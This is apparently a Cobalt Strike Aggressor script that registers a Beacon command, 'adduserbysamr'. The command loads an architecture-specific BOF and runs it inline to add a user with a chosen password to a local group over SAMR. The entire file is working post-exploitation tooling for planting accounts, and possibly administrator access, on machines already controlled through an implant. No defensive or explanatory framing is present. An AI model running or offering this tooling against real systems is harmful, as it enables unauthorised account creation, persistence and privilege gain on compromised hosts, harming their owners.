beacon_command_register(
"adduserbysamr", 
"Add a user to localgroup by samr", 
"Synopsis: adduserbysamr [username] [password] [groupName]");

alias adduserbysamr{
	local('$barch $handle $data $args');

	$uname = $2;
	$pass = $3;
	$group = $4;

	if ($uname eq "" or $pass eq "" or "$group" eq "") {
		berror($1, "usage command: help adduserbysamr");
		return;
	}

	# Read in the right BOF file
	# figure out the arch of this session
	$barch  = barch($1);

	# read in the right BOF file
    $handle = openf(script_resource("dist/adduserbysamr. $+ $barch $+ .o"));
	$data = readb($handle, -1);
	closef($handle);

	# Pack our arguments
	$args = bof_pack($1, "ZZZ", $uname, $pass, $group);

	beacon_inline_execute($1, $data, "go", $args);
}
